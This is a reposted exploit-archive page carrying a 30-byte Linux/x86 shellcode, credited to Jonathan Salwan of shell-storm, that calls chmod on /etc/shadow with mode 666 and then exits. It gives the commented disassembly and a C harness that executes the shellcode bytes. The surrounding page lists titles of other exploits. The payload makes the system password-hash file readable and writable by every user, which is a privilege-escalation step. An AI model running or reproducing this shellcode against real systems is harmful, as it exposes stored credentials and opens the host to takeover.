首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
linux/x86 chmod("/etc/shadow",666) & exit(0) 30 bytes
来源:http://www.shell-storm.org 作者:Salwan 发布时间:2009-02-23  

/*
   Linux/x86 - chmod("/etc/shadow",666) & exit(0)
    
 Info reg
        ------------------
    %eax = 15
    %ebx = /etc/shadow
    %ecx = 666

        %eax = 1
        %ebx = 0
  
   Shellcode 30 bytes
   Author: Jonathan Salwan < submit [AT] shell-storm.org >
   Web: http://www.shell-storm.org

 Disassembly of section .text:

 08048054 <.text>:
 8048054: 51                    push   %ecx
 8048055: 66 b9 b6 01           mov    $0x1b6,%cx
 8048059: 68 61 64 6f 77        push   $0x776f6461
 804805e: 68 63 2f 73 68        push   $0x68732f63
 8048063: 68 2f 2f 65 74        push   $0x74652f2f
 8048068: 89 e3                 mov    %esp,%ebx
 804806a: 6a 0f                 push   $0xf
 804806c: 58                    pop    %eax
 804806d: cd 80                 int    $0x80
 804806f: 40                    inc    %eax
 8048070: cd 80                 int    $0x80

*/

#include "stdio.h"

int main(int argc, char *argv[])
{

 char shellcode[] =  "\x51\x66\xb9\xb6"
    "\x01\x68\x61\x64"
    "\x6f\x77\x68\x63"  // chmod("/etc/shadow",666)
    "\x2f\x73\x68\x68"
    "\x2f\x2f\x65\x74"
    "\x89\xe3\x6a\x0f"
    "\x58\xcd\x80"

    "\x40\xcd\x80";     // exit(0);

 printf("Length: %d\n",strlen(shellcode));
 (*(void(*)()) shellcode)();
 
 return 0;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·win32 XP sp2 (FR) Sellcode cmd
·Graugon Forum v1 (id) SQL Comm
·MS Internet Explorer 7 Memory
·MS Internet Explorer 7 Memory
·Mozilla Firefox 3.0.6 (BODY on
·MS Internet Explorer 7 Memory
·pPIM 1.01 (notes.php id) Remot
·Got All Media version 7.0.0.3
·Free Arcade Script 1.0 LFI Com
·University of Washington IMAP
·Pyrophobia 2.1.3.1 LFI Command
·The FathFTP Active-X control s
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved